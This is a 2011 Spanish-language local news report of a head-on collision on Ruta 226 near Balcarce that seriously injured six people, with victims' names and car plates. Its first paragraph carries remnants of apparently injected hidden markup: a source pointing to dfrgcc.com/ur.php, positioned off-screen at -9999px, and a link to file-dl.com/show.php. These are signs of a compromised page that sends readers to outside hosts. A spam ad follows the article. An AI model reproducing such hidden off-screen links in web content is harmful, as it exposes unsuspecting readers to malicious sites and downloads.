09/01/2011, Policiales

Seis heridos graves en un impresionante choque en la Ruta 226

Seis heridos es el saldo hasta el momento de un impresionante choque frontal esta mañana en el km 86 de la Ruta 226 en el Partido de Balcarce. Bomberos, policías y sanitaristas se encuentran trabajando en el lugar. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

El hecho del que aún no se conocen mayores detalles sucedió pasada la hora 11 cuando en la zona del paraje “San Alberto” (entre Balcarce y Tandil) cuando entraron en colisión un Renault Clio (chapa  IGT 672)  y un Honda Civi (patente GTK 821) en los cuales viajaban seis turistas (unos que venían hacia la Costa Atlántica y otros que se iban).

A consecuencia del terrible impacto, uno de los vehículos luego de colisionar frontalmente quedó en posición invertida. Dado aviso a la Policía , de inmediato asistió personal de Seguridad Vial, a la vez que desde el Cuartel de Bomberos Voluntarios de Balcarce partían unidades de rescate , lo mismo que ambulancias del Hospital Subzonal.Los ocupantes del Honda fueron indetificados como Victor Naumszuk (72) y su esposa, Ida Barbeiro, oriundos de Ramos Mejía, la Matanza; en tanto los del Clío son  Dante Barbero (47), Vlara Ortiz (47) y sus hijos,  un nene de 9 años y una nena de 11; quienes a raíz de las graves heridas fueron derivados al Hospital aterno Infantil de Mar del Plata

A la llegada al lugar , los bomberos, al mando del Comandante Mayor Domingo Giuliano, se encomendaron a la triste tarea de rescatar de entre los hierros retorcidos a quienes habían quedado aprisionados en el lugar.

Fuentes del Hospital Subzonal de Balcarce confirmaron a madia tarde que los cuatro mayores allí asistidos, en encuentran en gravísimo estado, en tanto los niños fueron derivados al Materno Infantil.


Fotos Gentileza: Diario La Vanguardia (Balcarce)























 



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy